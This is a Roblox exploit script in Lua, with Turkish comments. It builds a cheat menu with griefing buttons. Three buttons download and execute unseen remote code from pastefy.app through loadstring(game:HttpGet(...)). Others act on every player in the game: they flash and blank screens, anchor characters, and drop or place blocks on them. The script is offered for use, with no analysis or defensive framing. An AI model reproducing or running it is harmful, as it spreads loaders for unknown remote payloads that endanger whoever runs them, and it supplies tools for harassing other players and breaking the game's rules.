local player = game.Players.LocalPlayer local screenGui = Instance.new("ScreenGui") screenGui.Parent = player.PlayerGui -- Ana GUI Frame'i local frame = Instance.new("Frame") frame.Size = UDim2.new(0.4, 0, 0.6, 0) frame.Position = UDim2.new(0.3, 0, 0.2, 0) frame.BackgroundColor3 = Color3.fromRGB(50, 50, 50) frame.Draggable = true frame.Active = true frame.Parent = screenGui -- Giriş Animasyonu local introText = Instance.new("TextLabel") introText.Size = UDim2.new(1, 0, 0.2, 0) introText.Position = UDim2.new(0, 0, -0.2, 0) introText.Text = "XXXOMER12345678" introText.TextScaled = true introText.BackgroundColor3 = Color3.fromRGB(0, 0, 0) introText.TextColor3 = Color3.fromRGB(255, 255, 255) introText.Parent = frame game:GetService("TweenService"):Create( introText, TweenInfo.new(3, Enum.EasingStyle.Bounce), { Position = UDim2.new(0, 0, 0, 0), Rotation = 360 } ):Play() task.wait(3) game:GetService("TweenService"):Create( introText, TweenInfo.new(2), { Position = UDim2.new(0, 0, 0.8, 0) } ):Play() -- Butonlar local function createButton(name, position, onClick) local button = Instance.new("TextButton") button.Size = UDim2.new(0.8, 0, 0.1, 0) button.Position = UDim2.new(0.1, 0, position, 0) button.Text = name button.TextScaled = true button.BackgroundColor3 = Color3.fromRGB(100, 100, 255) button.TextColor3 = Color3.fromRGB(255, 255, 255) button.Parent = frame button.MouseButton1Click:Connect(onClick) return button end -- 1. Killer Guest createButton("Killer Guest", 0.1, function() local char = player.Character or player.CharacterAdded:Wait() if char then local head = char:FindFirstChild("Head") if head then head.BrickColor = BrickColor.new("Bright red") local label = Instance.new("BillboardGui", head) label.Size = UDim2.new(0, 200, 0, 50) label.StudsOffset = Vector3.new(0, 2, 0) local text = Instance.new("TextLabel", label) text.Size = UDim2.new(1, 0, 1, 0) text.Text = "KILLER GUEST" text.TextScaled = true text.BackgroundTransparency = 1 text.TextColor3 = Color3.fromRGB(255, 0, 0) end end loadstring(game:HttpGet("https://pastefy.app/riYch0rX/raw"))() end) -- 2. Guest Killer 2 createButton("Guest Killer 2", 0.25, function() loadstring(game:HttpGet("https://pastefy.app/YJITpCRA/raw"))() local char = player.Character or player.CharacterAdded:Wait() if char then local tool = Instance.new("Tool", player.Backpack) tool.Name = "Killer Sword" tool.Grip = CFrame.new(0, 0, 0) end end) -- 3. Ekran Çökertme createButton("Ekran Çökertme", 0.4, function() for _, p in pairs(game.Players:GetPlayers()) do local gui = Instance.new("ScreenGui", p.PlayerGui) local blackout = Instance.new("Frame", gui) blackout.Size = UDim2.new(1, 0, 1, 0) blackout.BackgroundColor3 = Color3.fromRGB(255, 255, 255) task.wait(3) gui:Destroy() local char = p.Character if char then char.HumanoidRootPart.Anchored = true local block = Instance.new("Part", workspace) block.Size = Vector3.new(10, 10, 10) block.Position = char.HumanoidRootPart.Position + Vector3.new(0, 50, 0) block.BrickColor = BrickColor.new("Bright red") block.Anchored = false end end end) -- 4. Guest Özel createButton("Guest Özel", 0.55, function() loadstring(game:HttpGet("https://pastefy.app/YsJgITXR/raw"))() end) -- 5. Oyuncuları Durdurma createButton("Oyuncuları Durdurma", 0.7, function() for _, p in pairs(game.Players:GetPlayers()) do local char = p.Character if char then local freezeBlock = Instance.new("Part", workspace) freezeBlock.Size = Vector3.new(50, 50, 50) freezeBlock.Position = char.HumanoidRootPart.Position freezeBlock.Anchored = true task.wait(3) freezeBlock:Destroy() end end end) -- Devamı için diğer butonlar da bu şekilde eklenebilir.